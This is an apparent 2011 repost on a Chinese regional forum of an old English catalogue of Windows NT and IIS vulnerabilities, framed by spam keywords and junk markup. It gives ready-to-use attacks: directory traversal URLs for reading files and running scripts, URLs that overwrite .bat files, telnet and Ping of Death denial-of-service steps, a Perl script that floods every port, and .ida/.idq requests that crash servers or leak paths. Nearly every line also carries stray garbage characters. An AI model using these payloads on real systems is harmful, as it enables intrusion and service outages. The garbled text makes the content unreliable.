中文字幕精品亚洲无线码,99视频在线观看精品29,亚州十八禁免费不卡在线视颖,亚洲香蕉网久久综合影视

<sub id="xxpls"></sub><sub id="xxpls"></sub>

  • <listing id="xxpls"><u id="xxpls"></u></listing>
    <sub id="xxpls"></sub>

  • <sub id="xxpls"><ol id="xxpls"></ol></sub>
    <style id="xxpls"><u id="xxpls"></u></style>
  •  找回密碼
     注冊

    QQ登錄

    只需一步,快速開始

    NT的漏洞及描述(英文)

    [復制鏈接]
    1#
    發(fā)表于 2011-1-13 17:12:25 | 只看該作者 |倒序瀏覽 |閱讀模式
    受影響系統(tǒng):4.0,iis 1.0
    ; V2 N5 F  ]) l6 tA URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
    % @7 U( N) e2 K# y! L* W- Q; L9 B: _, D' ?3 Z
    A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script., }$ }- x! [7 j; _* o
    6 X, E% b3 j* h5 w5 y
    By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
    2 C+ K; l+ c5 ^& q5 d
    0 x/ R7 \: s2 {  x# ~: g--------------------------------------------------------------------
    - Q2 O0 s- y5 T; x
    / ]% r4 K8 e* q5 ^  O受影響系統(tǒng):4.0- [: R5 V2 H6 b6 W8 U
    A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
    * Z$ X& Z" u) i
    , M  }& N+ g# W9 a5 Y) dIf the file 'target.bat' exists, the file will be truncated.
    # }4 R/ `& z4 O8 B/ p% a
    # r/ H) c4 [2 S$ Z( w9 K$ M1 u$ g8 B+ m# {7 i( R* t. u+ t. Y  C
    A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
    9 p" n+ F  x/ S/ q$ _& p
    " S* m, ~4 I3 |- I----------------------------------------------------------------------4 u. B+ r' d6 B/ \2 I8 C
    9 \4 j3 i1 h8 g& f# k
    受影響系統(tǒng):3.51,4.0
    * L, H% N/ w+ ?4 sMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
    1 q/ ?- T. G& e+ A7 A) J
    ; u+ L' F5 e8 c% w) CThe following steps;
    " `: N( H( o  `
    7 X  S5 s% H1 bTelnet to an NT 4.0 system on port 135 * r* N( p) D/ P
    Type about 10 characters followed by a <CR>
    9 m" l* {) `8 m" w4 S0 i% bExit Telnet / R2 h. Z' i; u1 I; `7 U6 c
    results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.6 n8 a' l5 U: O# U: r! H: m: A

    + |7 {' [3 \0 q/ a4 WWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
    3 M" V, R. C2 ]7 z
    2 `% U3 j$ O# k1 }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
    ! _' W6 [+ `7 c0 q. n; L7 g  y3 o9 N
    If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.8 s7 Q! {# a, J+ C! n
    : i; v1 P; H) q, D2 f# [+ ^
    The following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):% u" Z# L% `2 V8 U) m! t

    8 d, T; Q) P8 `9 ~" d( m3 ?& u/*begin poke code*/4 s! E# W! \2 G/ s' D  W9 g% v: _

    + @6 Z  x0 U2 ^  v, {7 T8 g& l0 R: nuse Socket;, a8 w1 J" I' M; d2 g8 H1 `
    use FileHandle;
    , u, A* t# s7 |! w6 krequire "chat2.pl";/ s1 Q0 }& n/ j6 J) T; y
    ' B; E6 g5 @# }' L
    $systemname = $ARGV[0] && shift;
    0 A7 g: S' x$ Z' I) E- J) v/ C3 i9 |0 u8 |
    $verbose = 1; # tell me what you're hitting0 h- x9 B/ i, W% N
    $knownports = 1; # don't hit known problem ports7 p) k' k, D5 P$ `0 f0 a
    for ($port = $0; $port<65535; $port++)
    # E! V$ C7 @% i3 W( k& `, V. V! z; p* Q{5 I/ @0 E+ b% E' E+ j( ]/ v

    $ D9 i0 l  o( o- Y! j& J9 [: h4 J1 r1 F4 L* [, D
    if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
    8 ~, J0 M& Y: x! D+ [" snext;2 b/ n! b# G7 Z+ Z
    }3 \( [3 L  ?# ^: c6 E
    $fh = chat::open_port($systemname, $port);
    ! I7 z" Z% y+ w( W! H$ m9 Dchat::print ($fh,"This is about ten characters or more");
    ' z6 }1 y- \6 p" I& X" }( Q4 k/ `if ($verbose) {3 q2 T' s2 c) C* M- d
    print "Trying port: $port\n";
    ' O2 [3 i8 r4 @+ _9 z} . H& @* I( `; K
    chat::close($fh);. @- f& F/ p; d7 i
    2 }; ^5 q. d2 e6 R# w/ o
    }5 a8 p  r- T* c1 k

    / x( ]- A' q& V7 r1 G: u1 W* X! K" }& |, q, |% o% k
    /*end poke code*/3 P5 \) S( n. f# k$ `

    7 ~8 H1 {3 Y  U7 W6 Z( A4 lSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername$ T- e) a" ]+ r  G( V
    * }3 ~  i( }+ }  ~: Y9 i
    --------------------------------------------------------------------------------
    9 C6 i; I9 B5 H. O
    & b9 m* V0 X/ ~  ^0 ?/ `9 W  V受影響系統(tǒng):4.03 t/ ]) _  l" ~- {
    Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.+ j% V* T+ w+ I5 R' t% ]

    - W9 ^3 C  A$ E9 H$ VThis attack causes Dr. Watson to display an alert window and to log an error: 2 H2 N; l4 l2 R& i( [6 c" |
    - k9 t2 b# G" C$ y' A% ^
    "The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"
    * Q; k0 `0 T' i' }2 B2 _% O5 P8 _/ S! l" @  ^1 ]  e
    --------------------------------------------------------------------------------
    ) c& Q+ h$ w- i* \5 p
    $ \% K; x2 t# v受影響系統(tǒng):3.51,4.0
    6 {/ F) d0 Q7 u" fLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
    0 T3 I# z6 Z" O! ]8 g) o) Z/ T( j; Z1 ]
    STOP: 0X0000001E
    0 |7 ]+ N4 \1 u3 w2 K& o" kKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
    9 T4 c! X5 [. Z; u7 L1 {" z, q' r7 r  v0 s0 Q& i
    -OR-6 j9 v3 G: l5 b( j2 ^; i
    * ~1 Z( c1 T% j5 X: S2 ~
    STOP: 0x0000000A+ |# r8 c! g* g4 O
    IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS' @) r0 A, y4 e

    + _9 Y- K" H& F! I9 s1 k" v' O8 }0 S1 qNT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
    9 b& _$ n1 B4 a; G: U: N
    3 L' n' \! Y! j8 v* J--------------------------------------------------------------------------------
    2 S8 |* ]# ?' V9 q: x8 {
    ; Z. Z# E2 n4 G7 o" C! n) L! OMicrosoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
    . S! X3 d1 \7 N. Q/ V2 A$ D9 y* l& U( |
    --------------------------------------------------------
    , {) ^! |- z) w7 E6 ?
    % Y% U0 z, \# K8 a* J/ Q4 v( p9 rIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server
    您需要登錄后才可以回帖 登錄 | 注冊

    本版積分規(guī)則

    QQ|本地廣告聯(lián)系: QQ:905790666 TEL:13176190456|Archiver|手機版|小黑屋|汶上信息港 ( 魯ICP備19052200號-1 )

    GMT+8, 2025-6-28 03:04

    Powered by Discuz! X3.5

    © 2001-2025 Discuz! Team.

    快速回復 返回頂部 返回列表